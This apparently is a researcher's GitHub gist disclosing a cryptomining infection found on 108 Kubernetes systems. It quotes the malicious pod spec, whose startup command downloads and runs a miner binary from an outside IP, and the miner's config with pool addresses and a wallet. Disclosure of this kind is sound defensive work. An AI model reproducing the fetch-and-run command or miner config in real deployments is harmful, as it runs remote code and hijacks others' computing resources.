Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
systems infected with miner for kubernetes

The following is appearing in 108 kubernetes systems that i have tracked so far.

"containers": [
                    {
                        "command": [
                            "sh",
                            "-c",
                            "curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json"
                        ],
                        "resources": {},
                        "image": "centos",
                        "imagePullPolicy": "Always",
                        "terminationMessagePath": "/dev/termination-log",
                        "volumeMounts": [
                            {
                                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount",
                                "readOnly": true,
                                "name": "default-token-gdcjb"
                            }
                        ],
                        "terminationMessagePolicy": "File",
                        "name": "myresd4"
                    }
                ]
                

The Command

It uses a centos image and runs the following command on start up

"command": [
                         "sh",
                         "-c",
                         "curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json"
                     ]
                     

The JSON miner configuration

http://192.99.142.232:8220/2.json 
{
 "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
 "av": 0,                // algorithm variation, 0 auto select
 "background": false,    // true to run the miner in the background
 "colors": true,         // false to disable colored output    
 "cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
 "cpu-priority": 5,   // set process priority (0 idle, 2 normal to 5 highest)
 "donate-level": 1,      // donate level, mininum 1%
 "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
 "max-cpu-usage": 95,    // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.  
 "print-time": 60,       // print hashrate report every N seconds
 "retries": 5,           // number of times to retry before switch to backup server
 "retry-pause": 5,       // time to pause between retries
 "safe": false,          // true to safe adjust threads and av settings for current CPU
 "threads": null,        // number of miner threads
 "pools": [
     {
         "url": "158.69.133.20:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
         "pass": "x",                       // password for mining server
         "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
         "nicehash": false                  // enable nicehash/xmrig-proxy support
     },
     {
         "url": "192.99.142.249:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
         "pass": "x",                       // password for mining server
         "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
         "nicehash": false                  // enable nicehash/xmrig-proxy support
     },
     {
         "url": "202.144.193.110:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
         "pass": "x",                       // password for mining server
         "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
         "nicehash": false                  // enable nicehash/xmrig-proxy support
     }
 ],    
 "api": {
     "port": 0,                             // port for the miner API https://github.com/xmrig/xmrig/wiki/API
     "access-token": null,                  // access token for API
     "worker-id": null                      // custom worker-id for API
 }
}

Thanks

Thanks to the guys at @binaryedgeio for running some world wide scans for me!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.